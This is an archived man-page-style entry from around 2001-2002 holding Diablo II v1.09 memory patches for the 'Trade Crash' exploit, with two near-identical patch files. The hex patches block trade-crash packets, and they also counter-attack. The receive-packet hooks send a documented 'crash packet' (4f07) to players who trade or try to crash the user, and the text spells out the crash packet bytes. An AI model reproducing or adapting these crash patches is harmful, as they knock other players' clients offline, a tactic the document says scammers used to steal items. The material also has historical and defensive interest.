D2-TRADE-CRASH(6) Games Manual D2-TRADE-CRASH(6)

NAME

Diablo II Trade Crash Hacks — A collection of packets and patches for both executing and defending against the infamous 'Trade Crash' exploit.

METADATA

Platform: Diablo II
Era: 2001-2002
Status: Source available

SYNOPSIS

TradeCrash.dat — Definitions for malicious trade packets and anti-crash countermeasures.

DESCRIPTION

The Trade Crash was one of the more disruptive social-engineering exploits in Diablo II v1.09. By sending malformed or illegal sequences of trade-related packets, one player could forcefully crash the client of another player during a trade window.

This entry includes both the “offensive” scripts for triggering the crash and the “defensive” memory patches (AntiTradeAndCounter.dat) that I developed to intercept these malicious packets and prevent the client from crashing.

KEY FEATURES

  • Anti-Trade Crash V2 — A sophisticated countermeasure that detects crash attempts and automatically sends an “accept trade” response to mitigate the exploit.
  • Packet Analysis — Clear documentation of the specific bytes (4f 03, 13 00, etc.) used in the transaction protocol.
  • Movement Blocking — Patches to block “Closing Trade” packets sent when moving, a common vector for desync and crashes.

NOTES

Protecting oneself against these crashes was essential for anyone participating in high-value trading on Battle.net, as “scammers” would often use the crash to disconnect a player and steal items.

ATTACHMENTS (Browsing /usr/games/)

Path: /usr/games/diablo_2/trade_crash/TradeCrash.dat3637 bytes
start Note Written By Arsenic, a.k.a Artemis`Entreri
end

start v1.09 Optimized Keypress Functions In Trade Screen
#Allow you to use key functions while being in trade screen or asking someone to trade.
6fb27fc3 33c9 9090
end

start v1.09 No Writeback Bug With Chat Box Fixed
#Fixed a bug in D2 that was preventing you from using the key functions once the chat
#message box is opened when you're currently in special conditions : Stash, trade,
#gamble/buy screen, etc. 
6fb28509 a164 eb4f
end

start v1.09 Anti Trade Crash Version 1
#Prevent you from crashing with the trade crash. 
6ff64a60 66f745fc1008 e8a208010090
6ff75307 00000000000000000000000000000000 3d020000007505b82053f76f66f745fc
6ff75317 000000 1008c3
end

start v1.09 Block Closing Trade Packet When Moving After Asked
#In town
6fb25487 ba02 eb13
end

start v1.09 Block Closing Trade Packet When Moving After Someone Asked You
6fb2540d ba02 eb09
6fb2542c e8af7ef8ff 9090909090
end

start v1.09 Anti Trade Crash V2 2 Final - Written By Arsenic
#Check if someone attempted to crash us, if so send back accept trade packet
#and bCrash = true
6ff64a60 66f745fc1008 e89b08010090
6ff75300 00000000000000000000000000000000 3d020000007543b82A53f76f60e821c9
6ff75310 00000000000000000000000000000000 b3ff8b155453f76f8bc82bca81f9c409
6ff75320 00000000000000000000000000000000 00007225a35453f76fc6055053f76f01
6ff75330 00000000000000000000000000000000 66be02006a07686053f76f6a01e83ec4
6ff75340 0000000000000000000000 c8ff664e6685f675eb61c3

#Accept trade packet
6ff75360 00000000000000 4f030000000000
#Trade packet
6ff75370 000000000000000000 130000000000000000
#Crash packet
6ff75380 00000000000000 4f070000000000

#Recv Packet Checks
#--------------------------
#- Packet 7700 = Asking someone to trade -> Send crash packet
#- Packet 770c = Trade screen closed -> send back ask to trade packet
#- Packet 78   = Other player infos when trading -> call :SomeoneTriedToCrashUs - Get other plr name and slot
#--------------------------
6fc0166f 8bfdc1e902 e8894f0000
6fc065fd 00000000000000000000000000000000 803d5053f76f01753d6066813b770c75
6fc0660d 00000000000000000000000000000000 0e6a09685d68c06f6a01e864b1ffff66
6fc0661d 00000000000000000000000000000000 813b770075156a07688053f76f6a01e8
6fc0662d 00000000000000000000000000000000 4fb1ffffc6055053f76f00803b787505
6fc0663d 000000000000000000000000 e81b000000618bfdc1e902c3


# " has tried to crash you"
6fc0675d ** 2068617320747269656420746f20637261736820796f7500

# "Attempting to counter crash..."
6fc0677d ** 417474656d7074696e6720746f20636f756e7465722063726173682e2e2e00

#Someone tried to crash us - Count and copy name string
6fc0665d 00000000000000000000000000000000 6033c941803c0b0075f9498d7301bf5d
6fc0666d 0000000000 68c06ff3a4

#Someone tried to crash us - Print who tried to crash us and counter crash messages
6fc06672 00000000000000000000000000000000 6a1859be5d67c06ff3a46a13685d68c0
6fc06682 00000000000000000000000000000000 6fe878000000803d5253f76f0175276a
6fc06692 00000000000000000000000000000000 0f687d67c06fe8630000006a0959be70
6fc066a2 00000000000000000000000000000000 53f76fbf5d68c06ff3a48d43118b00a3
6fc066b2 00000000000000000000000000000000 6268c06feb07c6055053f76f006a0768
6fc066c2 00000000000000000000000000 6053f76f6a01e8b3b0ffff61c3
 
#Print messages to screen routine
6fc06700 00000000000000000000000000000000 8bec68000100008b5504b9ad68c06fff
6fc06710 00000000000000000000000000000000 156ccbb66f8a5508b9ad68c06fe8feb4
6fc06720 0000000000 f1ffc20800

#Counter crash boolean - 01 = Counter Crash
6ff75352 00 01

end
Path: /usr/games/diablo_2/trade_crash/AntiTradeAndCounter.dat2653 bytes
start v1.09 Anti Trade Crash V2 Final - Written By Arsenic
#Check if someone attempted to crash us, if so send back accept trade packet
#and bCrash = true
6ff64a60 66f745fc1008 e89b08010090
6ff75300 00000000000000000000000000000000 3d020000007543b82A53f76f60e821c9
6ff75310 00000000000000000000000000000000 b3ff8b155453f76f8bc82bca81f9c409
6ff75320 00000000000000000000000000000000 00007225a35453f76fc6055053f76f01
6ff75330 00000000000000000000000000000000 66be02006a07686053f76f6a01e83ec4
6ff75340 0000000000000000000000 c8ff664e6685f675eb61c3

#Accept trade packet
6ff75360 00000000000000 4f030000000000
#Trade packet
6ff75370 000000000000000000 130000000000000000
#Crash packet
6ff75380 00000000000000 4f070000000000

#Recv Packet Checks
#--------------------------
#- Packet 7700 = Asking someone to trade -> Send crash packet
#- Packet 770c = Trade screen closed -> send back ask to trade packet
#- Packet 78   = Other player infos when trading -> call :SomeoneTriedToCrashUs - Get other plr name and slot
#--------------------------
6fc0166f 8bfdc1e902 e8894f0000
6fc065fd 00000000000000000000000000000000 803d5053f76f01753d6066813b770c75
6fc0660d 00000000000000000000000000000000 0e6a09685d68c06f6a01e864b1ffff66
6fc0661d 00000000000000000000000000000000 813b770075156a07688053f76f6a01e8
6fc0662d 00000000000000000000000000000000 4fb1ffffc6055053f76f00803b787505
6fc0663d 000000000000000000000000 e81b000000618bfdc1e902c3

# " has tried to crash you"
6fc0675d ** 2068617320747269656420746f20637261736820796f7500

# "Attempting to counter crash..."
6fc0677d ** 417474656d7074696e6720746f20636f756e7465722063726173682e2e2e00

#Someone tried to crash us - Count and copy name string
6fc0665d 00000000000000000000000000000000 6033c941803c0b0075f9498d7301bf5d
6fc0666d 0000000000 68c06ff3a4

#Someone tried to crash us - Print who tried to crash us and counter crash messages
6fc06672 00000000000000000000000000000000 6a1859be5d67c06ff3a46a13685d68c0
6fc06682 00000000000000000000000000000000 6fe878000000803d5253f76f0175276a
6fc06692 00000000000000000000000000000000 0f687d67c06fe8630000006a0959be70
6fc066a2 00000000000000000000000000000000 53f76fbf5d68c06ff3a48d43118b00a3
6fc066b2 00000000000000000000000000000000 6268c06feb07c6055053f76f006a0768
6fc066c2 00000000000000000000000000 6053f76f6a01e8b3b0ffff61c3
 
#Print messages to screen routine
6fc06700 00000000000000000000000000000000 8bec68000100008b5504b9ad68c06fff
6fc06710 00000000000000000000000000000000 156ccbb66f8a5508b9ad68c06fe8feb4
6fc06720 0000000000 f1ffc20800

#Counter crash boolean - 01 = Counter Crash
6ff75352 00 01

end

TECHNOLOGIES

  • Network Protocol
  • Packet Manipulation
  • Exploit Development
int03h.com circa 2001-2002 D2-TRADE-CRASH(6)
<< Return to /usr/games